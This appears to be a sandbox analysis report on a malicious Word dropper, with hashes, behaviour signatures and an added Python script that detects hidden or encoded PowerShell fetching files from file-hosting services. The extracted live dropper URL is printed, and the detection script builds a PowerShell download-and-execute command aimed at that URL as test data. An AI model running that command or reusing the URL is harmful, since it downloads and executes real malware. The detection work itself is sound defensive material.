General

  • Target

    ba2a2df52cd4c726184d39828a4a4f91ee521c291341b390f3c2647732d6714c.doc

  • Size

    107KB

  • Sample

    241028-dqnpdszbpn

  • MD5

    86157210cf13494bbeb9d4808652a687

  • SHA1

    76accace803a0268674ccf47bf316b7cfb11b49f

  • SHA256

    ba2a2df52cd4c726184d39828a4a4f91ee521c291341b390f3c2647732d6714c

  • SHA512

    718e06631d33bad1033fed7878471a1ea21db5d5bf14e2730407d807e7ff07b1b078f8adf89083a31b32a6e16883bcf6c01561e39c7246f943d5ee897a8af6e7

  • SSDEEP

    768:3dGKS4gI3wTHfrwJDJB8C6CpojhM2D0G1p8Q:3dGKS4/f978zCClM40LQ

Malware Config

  • Extracted

    Language
      ps1

    Deobfuscated

    URLs

      ps1.dropper
        https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

      exe.dropper
        https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Targets

    • Target

      ba2a2df52cd4c726184d39828a4a4f91ee521c291341b390f3c2647732d6714c.doc

    • Size

      107KB

    • MD5

      86157210cf13494bbeb9d4808652a687

    • SHA1

      76accace803a0268674ccf47bf316b7cfb11b49f

    • SHA256

      ba2a2df52cd4c726184d39828a4a4f91ee521c291341b390f3c2647732d6714c

    • SHA512

      718e06631d33bad1033fed7878471a1ea21db5d5bf14e2730407d807e7ff07b1b078f8adf89083a31b32a6e16883bcf6c01561e39c7246f943d5ee897a8af6e7

    • SSDEEP

      768:3dGKS4gI3wTHfrwJDJB8C6CpojhM2D0G1p8Q:3dGKS4/f978zCClM40LQ

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run PowerShell and hide the display window.

    • Evasion via Device Credential Deployment

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory
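The signatures above describe one chain: a Word document starts PowerShell with a hidden window, and the script pulls its next stage from a legitimate file-hosting service (here the drive.google.com URL extracted into the malware config). As an added example, not part of this sandbox report and not the sample's own code, the Python below triages a process-creation event for that combination. It goes a little beyond the report by also decoding a `-EncodedCommand` payload (UTF-16LE base64) and scanning the decoded script for download URLs. Field names mimic Sysmon Event ID 1; the sample events, the encoded script, the hosts in `ABUSED_HOSTS` other than drive.google.com, and the "two findings" threshold are constructed assumptions for the example.

```python
import base64
import re
from urllib.parse import urlparse

# Legitimate file-hosting services seen as download stages. drive.google.com is
# the host this report extracted; the other entries are an assumption for the
# example and should be tuned to what is normal in your environment.
ABUSED_HOSTS = {
    "drive.google.com",
    "docs.google.com",
    "www.dropbox.com",
    "dl.dropboxusercontent.com",
    "onedrive.live.com",
    "1drv.ms",
}

# Office binaries that should almost never spawn a scripting interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe"}

# powershell.exe accepts any unambiguous prefix of a parameter name, so
# "-w hidden", "-win hidden" and "-WindowStyle Hidden" are equivalent.
# Loose on the parameter prefix, strict on the value.
HIDDEN_WINDOW = re.compile(r"(?:^|\s)-w[a-z]*\s+hidden\b", re.I)

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_CMD = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

URL = re.compile(r"https?://[^\s'\"<>)]+", re.I)


def decode_encoded_command(blob: str):
    """Decode a -EncodedCommand payload; None if not valid base64 / UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(event: dict) -> dict:
    """Score one process-creation event; return findings plus every URL seen
    in the command line or in the decoded script, so an analyst can pivot."""
    result = {"suspicious": False, "findings": [], "urls": [], "decoded": None}
    if _basename(event.get("Image", "")) not in INTERPRETERS:
        return result
    cmdline = event.get("CommandLine", "")

    match = ENCODED_CMD.search(cmdline)
    if match:
        result["decoded"] = decode_encoded_command(match.group(1))
        if result["decoded"] is not None:
            result["findings"].append("encoded_command")
    if HIDDEN_WINDOW.search(cmdline):
        result["findings"].append("hidden_window")
    if _basename(event.get("ParentImage", "")) in OFFICE_PARENTS:
        result["findings"].append("office_parent")

    # Scan both the raw command line and the decoded script for download stages.
    result["urls"] = URL.findall(cmdline + " " + (result["decoded"] or ""))
    hosts = {urlparse(u).hostname for u in result["urls"]}
    if hosts & ABUSED_HOSTS:
        result["findings"].append("abused_hosting_url")

    # One indicator alone is noisy (admins hide windows too); two together is not.
    result["suspicious"] = len(result["findings"]) >= 2
    return result


def triage(events):
    """Return the suspicious events with their verdicts attached."""
    hits = []
    for event in events:
        verdict = analyze_event(event)
        if verdict["suspicious"]:
            hits.append({**event, **verdict})
    return hits


# Constructed sample events. The first mimics the chain this report describes
# (Word -> hidden PowerShell -> drive.google.com stage); the encoded script is
# built here for the example, not taken from the sample.
SAMPLE_SCRIPT = ("IEX (New-Object Net.WebClient).DownloadString("
                 "'https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur')")
_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Temp"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["findings"], hit["urls"])
```

Feed it real Sysmon or 4688 events (only `Image`, `ParentImage` and `CommandLine` are read) and pivot on the returned `urls`; the `id=` value of a Google Drive download link is a stable indicator for the staged payload even when the document hash changes.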

MITRE ATT&CK Enterprise v15

Tasks